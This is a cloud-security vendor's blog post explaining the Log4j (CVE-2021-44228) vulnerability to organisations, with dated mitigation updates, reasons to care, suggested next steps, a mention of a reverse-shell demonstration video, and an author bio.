Apache Log4j is an open-source Java package. It is the most widely used default logging package. Many many things can go wrong. Attackers may execute their own code in your server, remotely over the network, without any permission! If not code, they can scoop up all the server secrets that are in the server memory. Affected users include Apple iCloud, AWS, Google, Cloudflare, most of the financial services world, among others.
Update (Dec 29th 2021 - 02:20 UTC): A new vulnerability with a moderate severity was identified and assigned CVE-2021-44832. Apache has released v2.17.1 to mitigate this. The bug requires attacker to control configuration for any effect. If, as part of mitigation, you have removed the JNDI class altogether from log4j JARs, you are already protected.
Update (Dec 14th 2021 - 07:58 UTC): Elasticsearch announcement (ESA-2021-31), Elasticsearch 5 is susceptible to both RCE and info leak via DNS. For versions 5.6.11 - 5.6.16 the vulnerability can be mitigated by setting the Dlog4j2.formatMsgNoLookups=true JVM option in JAVA_TOOL_OPTIONS env var or by setting system property
Update (Dec 14th 2021 - 06:00 UTC): You can download a short one pager to share with your customers, internal teams and other stakeholders using this link.
Apache Log4j is an open-source Java package. It is the most widely used default logging package. Affected users include Apple iCloud, AWS, Google, Cloudflare, most of the financial services world, among others.
What can go wrong?
Many many things can go wrong. Attackers may execute their own code in your server, remotely over the network, without any permission! If not code, they can scoop up all the server secrets that are in the server memory.
https://xkcd.com/2347/
Why should you care?
1. Log4j is one of the most widely used component for Java and Java VM based applications.
2. Log4j maybe used directly in code or in another component. So there is no easy way to figure out if you are using it in production.
3. If it is being used, attacking it just requires a simple HTTP request. This is why it is rated at severity 10!!!
4. Are you absolutely sure your organization doesn’t use Java/JVM? This includes applications & System libs as well
You have convinced me, what do I do next?
1. Ask your SaaS vendors if they are impacted and what are they doing about it?
2. Talk to team leads/developers if they use any software that requires Java to be installed
3. Read updates from cloud service providers on how they are patching and if there is something you need to do
4. Share this one-pager with everyone who should understand the gravity of the current situation
5. Talk to riyaz@kloudle.com if want to see a demonstration of how simple it is to attack and steal data
CVE-2021-44228 log4j Exploitation in Action
A demonstration of a reverse shell on AWS cloud by exploiting CVE-2021-44228 (log4j2 RCE) vulnerability.
ABOUT THE AUTHOR
Akash Mahajan
Akash helps CTOs & SREs with security monitoring of their cloud-native stack | CKA, OSCP | Author - Security Automation using Ansible, Burp Suite Essentials. An accomplished security professional with over a decade’s experience of providing specialist application and infrastructure advice at the highest levels to companies, governments, and organisations around the world. Now busy building an easy-to-use security platform to help CTOs & SREs with Consolidated Security View of their cloud accounts for security compliance and operational security. Conference speaker and trainer at BlackHat US, All Day DevOps Twice, DevOps Enterprise Summit, OWASP, and NullCon.Specialties: Cloud Security - AWS, Azure, GCP, IBM, Kubernetes; Container Security; Cloud-Native Security; Building security automation products. Certifications: CKA, OSCP. Author of two security books now used as the go-to reference by the product creators. Security Automation using Ansible, Burp Suite Essentials.
Enjoyed this read?
Subscribe to our newsletter and stay ahead with more great insights and resources on cloud security!
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.